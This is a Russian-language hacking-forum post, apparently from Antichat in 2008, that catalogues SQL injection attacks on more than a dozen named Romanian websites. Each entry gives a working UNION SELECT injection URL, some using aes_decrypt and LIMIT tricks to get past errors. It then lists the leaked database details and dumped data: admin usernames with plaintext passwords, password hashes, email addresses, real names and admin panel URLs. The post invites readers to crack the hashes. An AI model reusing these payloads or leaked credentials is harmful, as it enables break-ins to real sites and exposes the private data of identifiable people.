|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.hofigal.eu/produse.php?id=-446+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
Database Version: 4.1.22-standard-log
Database name: hofigal_hofigal
User name: hofigal_soft@ro5.globehosting.net
Tables: admin
users- user_id, username, password
hofigal:tazmanian
в таблице админ не смог подобрать колонки
www.hofigal.eu/admin
спасибо за внимание
пример для новичков
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,2,3,4/*
выводит поля ....вроде все норм, но при
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,concat_ws(user(),database(),versi on()),3,4/*
ошибка,многие забросили бы.... но не надо забывать про AES_ENCRYPT и AES_DECRYPT и конечно же LIMIT
а вот и результат
http://www.carpediemtransport.ro/stirea.php?id=1+UNION+SELECT+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,version(),database(),user()),0 x71),0x71),3,4+LIMIT+1,1/*
Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost
жаль что не подобрал таблицы...
спасибо всем
http://www.apd.ro/proiect.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(version(),0x3a,database(),0x3a,user()),0x71),0x 71),4,5,6,7,8/*
Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost
таблицы не подобрал...но сильно и не старался
http://www.remediiflorale.ro/remedii_detalii.php?ID=1+union+select+1,2,3,concat _ws(user(),database,version()),5,6,7,8,9+limit+1,1 /*
Database Version: 4.1.22-standard
Database name: remediif_remediiflorale
User name: remediif_cabat@localhost
подобрал только
phpbb_users
user_email, user_password , username
claudia.cabat@remediiflorale.ro:71d2313de7268950bb abc4bcea2db583:remediiflorale
хеш не брутил...кто имеет желание....пожалуйста
всем спасибо
http://www.gfialomita.ro/det_public.php?id=-1'+UNION+SELECT+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7/*
Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost
нашёл в базе mysql.user
password : user
7864ed0a46b1e475:root
пароль был найден на hashcracking.info за что огромное спасибо Lebed
pass : market
всем спасибо
http://www.lilstructuraldesign.ro/work.php?id=1+UNION+SELECT+1,2,3,4,concat_ws(0x3a, user(),version(),database()),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: lil_web
User name: lil_web@localhost
нашел users: id, pass, user
amro:b4af804009cb036a4ccdc33431ef9ac9: pass1234
www.lilstructuraldesign.ro/admin
пасс к сожалению не подходит
фтп у них публик...
спасибо всем
http://www.darvari.ro/index.php?id=2+UNION+SELECT+1,CONCAT_WS(0x3a,user( ),version(),database()),3,4,5,6,7,8,9+LIMIT+1,1/*
Database Version: 4.1.20-log
Database name: shdarvariro
User name: darvariro@193.226.140.172
нашёл phpbb_users
user_email, user_password, username
cristian_george1964@yahoo.com:$H$98LNbj3Sb0XchuuOz azRcHsqkYied0.:CristianSurdu
cristian_papusoiu82@yahoo.com:fde4fc933d4371c52414 7a4699484248:Papusoiu Cristian
adeladoloc@yahoo.com:282bbbfb69da08d03ff4bcf34a94b c53:Viorel Doloc
iulia.velican@gmail.com:d901619e37d52078ec5765b3df dd8680:florin-v
adi.oprea@schweighofer.ro:4dd77ecaf88620f5da8967bb d91d9506:adi.oprea
[n_vali68@yahoo.com:$H$9ud2wu9dbIjhULsv2FFVYqLcb/7XD70:vali nedelea
и так далее, хеши не брутил... милости просим всеx желающих
http://www.gimco-rentacar.ro/veicolo.php?id=1+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7+limit+1,1/*
интересный вывод..кто захочет тот поймёт.. таблы к сожаленю не подобрал
Database Version: 4.1.21-standard-log
Database name: gimco_cms
User name: gimco_cms@localhost
http://www.intorsura.ro/clubrestdisc/estaur.php?id=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11+limit +1,1
Database Version: 4.1.22-standard-log
Database name: intors_intorsura
User name: intors_jymmy5@localhost
admin
nume,parola
Joos:jooti1103
ЗЫ. Хорошо знать много языков.... иногда колонки попадаются и такие..переведённые
http://www.intorsura.ro/admin/utilizatori/login/admin.php
without password
http://www.3la3.ro/detalii_stire.php?id=31+UNION+SELECT+1,2,3,concat_ ws(0x3a,user(),version(),database()),5,6,7,8,9,10, 11,12,13+LIMIT+1,1/*
Database Version: 5.0.45-community
Database name: sportare_sportarena
User name: sportare_kadour@localhost
administratori:
drogo:c973dec0d6f378c500a1dadc14149887
valau:c973dec0d6f378c500a1dadc14149887
constu:e7b67b0bf3aa2a72dc31458acd5f905f
operator:08fbb70044e49261bb4d40262144c791:ziani
pedro:4a5970427c6a784b930b0668b1189c8b
http://www.3la3.ro/admin
спасибо за внимание
http://www.psc.ro/comunicate_detalii.php?id=1+UNION+SELECT+1,concat_ ws(0x3a,user(),version(),database()),3,4,5,6,7/*
Database Version: 4.1.20-log
Database name: netpscro
User name: pscro@193.226.140.172
таблы подобрать не смог
http://www.generatoare.ro/listare.php?id=1'+union+select+1,2,aes_decrypt(aes _encrypt(concat(0x3a,version(),0x3a,database(),0x3 a,user()),0x71),0x71),4,5+LIMIT+1,1/*
Database Version: 4.1.12
Database name: generatoare
User name: generat_oare@localhost
смотрим в хедере...или сурс откройте
users:
columns: id,email,nume,parola
http://www.corso-automobile.ro/detalii.php?id=1+UNION+SELECT+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14+LIMIT+1,1/*
Database Version: 5.0.45-community-log
Database name: delsoftr_corsoautomobile
User name: delsoftr_vlad@localhost
в БД >13 базочек... копайтесь сами.пароли там в открытом виде.удачи
delsoftr_adan
delsoftr_adan2
delsoftr_adantrans
delsoftr_autocentrusibiu
delsoftr_auto
delsoftr_autostock
delsoftr_autostyleWWW
delsoftr_autotest
delsoftr_autotest
delsoftr_delcar
delsoftr_delcar2
delsoftr_delcarmoreni
delsoftr_delsoft
delsoftr_demogestiune ......
http://www.topline.ro/stiri.php?id=1'+union+select+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,Version(),Database(),User()),0 x71),0x71),3,4,5+limit+1,1/*
Database Version: 5.0.18
Database name: topline
User name: root@localhost
в БД 2 базы
1.mysql
2.topline
в первой инфа о БД, юзер пасс..и т.д.и.т.п.
во вторй есть админы
вернее админ, так как он там один вроде
login: admin
password: parola123
http://www.topline.ro/admin
на сегодня всё..всем спасибо за проявленное внимание..ваш покорный слуга Горев
Последний раз редактировалось Constantine; 07.07.2008 в 19:59..
|